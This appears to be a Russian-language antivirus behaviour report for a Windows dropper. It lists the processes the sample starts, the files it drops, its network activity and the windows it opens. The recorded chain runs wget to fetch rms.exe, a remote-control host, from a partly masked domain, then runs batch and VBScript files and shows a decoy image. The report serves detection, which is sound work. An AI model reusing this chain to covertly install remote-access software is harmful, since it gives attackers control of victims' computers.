Техническая информация
- '%APPDATA%\rms.exe'
- '%APPDATA%\wget.exe' http://rg##st.ru/download/55428728/150955abbb1e216195fe6209dd48e343a1e9e24b/rms.exe
- '%APPDATA%\rms.exe' (загружен из сети Интернет)
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\shimgvw.dll,ImageView_Fullscreen %APPDATA%\image.png.jpg
- '<SYSTEM32>\attrib.exe' -h -s -r /d /s "%PROGRAM_FILES%\Remote Manipulator System - Host\*.*"
- '<SYSTEM32>\wscript.exe' "%APPDATA%\include.vbs"
- '<SYSTEM32>\cmd.exe' /c ""%APPDATA%\start.bat" "
- %HOMEPATH%\Recent\image.png.lnk
- %APPDATA%\start_download.txt
- %APPDATA%\rms.exe
- %HOMEPATH%\Recent\Application Data.lnk
- %APPDATA%\image.png.jpg
- %APPDATA%\wget.exe
- %APPDATA%\start.bat
- %APPDATA%\include.vbs
- 'rg##st.ru':80
- rg##st.ru/download/55428728/150955abbb1e216195fe6209dd48e343a1e9e24b/rms.exe
- DNS ASK rg##st.ru
- ClassName: 'ShImgVw:CPreviewWnd' WindowName: '(null)'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'